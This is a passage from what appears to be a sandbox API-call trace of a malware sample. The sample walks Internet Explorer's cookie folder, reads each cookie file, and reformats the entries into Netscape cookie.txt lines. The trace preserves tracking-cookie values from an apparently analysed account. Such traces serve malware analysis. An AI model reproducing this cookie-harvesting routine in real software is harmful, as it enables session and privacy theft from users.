(in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="live.com\x09TRUE\x09/\x09FALSE\x091533563843\x09MUID\x09257B68023A2F6735163862BF3E2F6361\r\n\r\n") returned 74 [0591.201] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.201] PathMatchSpecW (pszFile="index.dat", pszSpec="*.txt") returned 0 [0591.201] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.201] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 0 [0591.201] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0591.201] PathCombineW (in: pszDest=0x52e108, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low" [0591.201] PathCombineW (in: pszDest=0x52dc78, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*" [0591.201] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*", lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 0x57d1e0 [0591.203] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.205] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.205] PathMatchSpecW (pszFile="aetadzjz@ad.360yield[2].txt", pszSpec="*.txt") returned 1 [0591.205] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="aetadzjz@ad.360yield[2].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ad.360yield[2].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ad.360yield[2].txt" [0591.205] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ad.360yield[2].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@ad.360yield[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.205] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=443) returned 1 [0591.205] VirtualAlloc (lpAddress=0x0, dwSize=0x1bb, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.206] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x1bb, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x1bb, lpOverlapped=0x0) returned 1 [0591.206] atoi (_Str="2147484672") returned -2147482624 [0591.206] atoi (_Str="3119569024") returned -1175398272 [0591.206] atoi (_Str="30620706") returned 30620706 [0591.206] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="ad.360yield.com\x09TRUE\x09/\x09FALSE\x091507019797\x09tuuid\x09b517517f-31b5-418f-8f29-e0f819b2ed12\r\n\r\n") returned 86 [0591.206] atoi (_Str="2147484672") returned -2147482624 [0591.206] atoi (_Str="3119569024") returned -1175398272 [0591.206] atoi (_Str="30620706") returned 30620706 [0591.206] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="ad.360yield.com\x09TRUE\x09/\x09FALSE\x091507019797\x09tuuid_last_update\x091499243797\r\n\r\n") returned 72 [0591.206] atoi (_Str="2147484672") returned -2147482624 [0591.206] atoi (_Str="3119569024") returned -1175398272 [0591.206] atoi (_Str="30620706") returned 30620706 [0591.206] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="ad.360yield.com\x09TRUE\x09/\x09FALSE\x091507019797\x09um\x09!42,.1rPd9TnzTtC4mKwCwHBLEw8gORk9Gac9bZRLWyBiROv6A##,1507019797\r\n\r\n") returned 110 [0591.207] atoi (_Str="2147484672") returned -2147482624 [0591.207] atoi (_Str="3119569024") returned -1175398272 [0591.207] atoi (_Str="30620706") returned 30620706 [0591.207] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="ad.360yield.com\x09TRUE\x09/\x09FALSE\x091507019797\x09umeh\x09!42,0,330694597,-1\r\n\r\n") returned 67 [0591.207] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.207] PathMatchSpecW (pszFile="aetadzjz@ad13.adfarm1.adition[2].txt", pszSpec="*.txt") returned 1 [0591.207] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="aetadzjz@ad13.adfarm1.adition[2].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ad13.adfarm1.adition[2].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ad13.adfarm1.adition[2].txt" [0591.207] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@ad13.adfarm1.adition[2].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@ad13.adfarm1.adition[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.208] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=89) returned 1 [0591.208] VirtualAlloc (lpAddress=0x0, dwSize=0x59, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.208] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x59, lpOverlapped=0x0) returned 1 [0591.208] atoi (_Str="2147484672") returned -2147482624 [0591.208] atoi (_Str="2336413312") returned -1958553984 [0591.208] atoi (_Str="30638803") returned 30638803 [0591.208] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="ad13.adfarm1.adition.com\x09TRUE\x09/\x09FALSE\x091514792321\x09fc14\x091001a\r\n\r\n") returned 63 [0591.208] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.208] PathMatchSpecW (pszFile="aetadzjz@addthis[2].txt", pszSpec="*.txt") returned 1 [0591.208] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="aetadzjz@addthis[2].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@addthis[2].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@addthis[2].txt" [0591.209] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@addthis[2].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@addthis[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.209] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=179) returned 1 [0591.209] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.209] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0xb3, lpOverlapped=0x0) returned 1 [0591.209] atoi (_Str="2147484672") returned -2147482624 [0591.209] atoi (_Str="3260078208") returned -1034889088 [0591.209] atoi (_Str="30749452") returned 30749452 [0591.209] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="addthis.com\x09TRUE\x09/\x09FALSE\x091562315797\x09uid\x09595ca5159c155707\r\n\r\n") returned 60 [0591.209] atoi (_Str="2147484672") returned -2147482624 [0591.209] atoi (_Str="3260078208") returned -1034889088 [0591.210] atoi (_Str="30749452") returned 30749452 [0591.210] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="addthis.com\x09TRUE\x09/\x09FALSE\x091562315797\x09um\x092Ke.'B60C8ABF32484369'\r\n\r\n") returned 65 [0591.210] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.210] PathMatchSpecW (pszFile="aetadzjz@adfarm1.adition[2].txt", pszSpec="*.txt") returned 1 [0591.210] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="aetadzjz@adfarm1.adition[2].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adfarm1.adition[2].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adfarm1.adition[2].txt" [0591.210] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adfarm1.adition[2].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adfarm1.adition[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.210] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=101) returned 1 [0591.210] VirtualAlloc (lpAddress=0x0, dwSize=0x65, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.210] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x65, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x65, lpOverlapped=0x0) returned 1 [0591.211] atoi (_Str="2147484672") returned -2147482624 [0591.211] atoi (_Str="2336413312") returned -1958553984 [0591.211] atoi (_Str="30638803") returned 30638803 [0591.211] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adfarm1.adition.com\x09TRUE\x09/\x09FALSE\x091514792321\x09UserID1\x096439203051076714522\r\n\r\n") returned 75 [0591.211] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.211] PathMatchSpecW (pszFile="aetadzjz@adformdsp[2].txt", pszSpec="*.txt") returned 1 [0591.211] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="aetadzjz@adformdsp[2].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adformdsp[2].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adformdsp[2].txt" [0591.211] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adformdsp[2].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adformdsp[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.212] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=93) returned 1 [0591.212] VirtualAlloc (lpAddress=0x0, dwSize=0x5d, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.212] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x5d, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x5d, lpOverlapped=0x0) returned 1 [0591.212] atoi (_Str="2147484672") returned -2147482624 [0591.212] atoi (_Str="3187200384") returned -1107766912 [0591.212] atoi (_Str="30614671") returned 30614671 [0591.212] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adformdsp.net\x09TRUE\x09/\x09FALSE\x091504427791\x09uid\x09-1605761638446350447\r\n\r\n") returned 66 [0591.212] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.212] PathMatchSpecW (pszFile="aetadzjz@adform[2].txt", pszSpec="*.txt") returned 1 [0591.212] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="aetadzjz@adform[2].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adform[2].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adform[2].txt" [0591.212] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adform[2].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adform[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.213] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=302) returned 1 [0591.213] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.213] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x12e, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x12e, lpOverlapped=0x0) returned 1 [0591.214] atoi (_Str="2147484672") returned -2147482624 [0591.214] atoi (_Str="4118510336") returned -176456960 [0591.214] atoi (_Str="30604009") returned 30604009 [0591.214] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adform.net\x09TRUE\x09/\x09FALSE\x091499848590\x09adtrc\x091\r\n\r\n") returned 46 [0591.214] atoi (_Str="2147484672") returned -2147482624 [0591.214] atoi (_Str="3324831744") returned -970135552 [0591.214] atoi (_Str="30608636") returned 30608636 [0591.214] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adform.net\x09TRUE\x09/\x09FALSE\x091501835792\x09TPC\x091\r\n\r\n") returned 44 [0591.214] atoi (_Str="2147484672") returned -2147482624 [0591.214] atoi (_Str="4194036608") returned -100930688 [0591.214] atoi (_Str="30602802") returned 30602802 [0591.214] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adform.net\x09TRUE\x09/\x09FALSE\x091499330195\x09CM\x091\r\n\r\n") returned 43 [0591.214] atoi (_Str="2147484672") returned -2147482624 [0591.214] atoi (_Str="192233088") returned 192233088 [0591.214] atoi (_Str="30614672") returned 30614672 [0591.214] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adform.net\x09TRUE\x09/\x09FALSE\x091504427921\x09uid\x09-1605761638446350447\r\n\r\n") returned 63 [0591.214] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.214] PathMatchSpecW (pszFile="aetadzjz@adnxs[2].txt", pszSpec="*.txt") returned 1 [0591.214] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="aetadzjz@adnxs[2].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adnxs[2].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adnxs[2].txt" [0591.214] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\aetadzjz@adnxs[2].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\aetadzjz@adnxs[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.215] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=745) returned 1 [0591.215] VirtualAlloc (lpAddress=0x0, dwSize=0x2e9, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.215] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x2e9, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x2e9, lpOverlapped=0x0) returned 1 [0591.219] atoi (_Str="2147492864") returned -2147474432 [0591.219] atoi (_Str="84601728") returned 84601728 [0591.219] atoi (_Str="30620707") returned 30620707 [0591.219] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adnxs.com\x09TRUE\x09/\x09FALSE\x091507019923\x09icu\x09ChII-usDEAoYBSAFKAUwk8vyygUQk8vyygUYBA..\r\n\r\n") returned 82 [0591.219] atoi (_Str="2147492864") returned -2147474432 [0591.219] atoi (_Str="1209069312") returned 1209069312 [0591.219] atoi (_Str="30602803") returned 30602803 [0591.219] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adnxs.com\x09TRUE\x09/\x09FALSE\x091499330326\x09sess\x091\r\n\r\n") returned 44 [0591.219] atoi (_Str="2147492864") returned -2147474432 [0591.219] atoi (_Str="114601728") returned 114601728 [0591.219] atoi (_Str="30620707") returned 30620707 [0591.219] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adnxs.com\x09TRUE\x09/\x09FALSE\x091507019926\x09uuid2\x095433079502798827959\r\n\r\n") returned 63 [0591.220] atoi (_Str="2147492864") returned -2147474432 [0591.220] atoi (_Str="94601728") returned 94601728 [0591.220] atoi (_Str="30620707") returned 30620707 [0591.220] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="adnxs.com\x09TRUE\x09/\x09FALSE\x091507019924\x09anj\x09dTM7k!M4/CS_U7V>e.ud2lmbVP$ca5sw#$[4SaZX!(wQsi/jGFQbLW]d<9Vi+OnF+#XXpA(!cb0eE!=9sHeY$/vsH7w_:_d8SlBe>V_?Sm>FIi4CGL0_%pQA7MPVM#8P/?Z-=C(Lo0K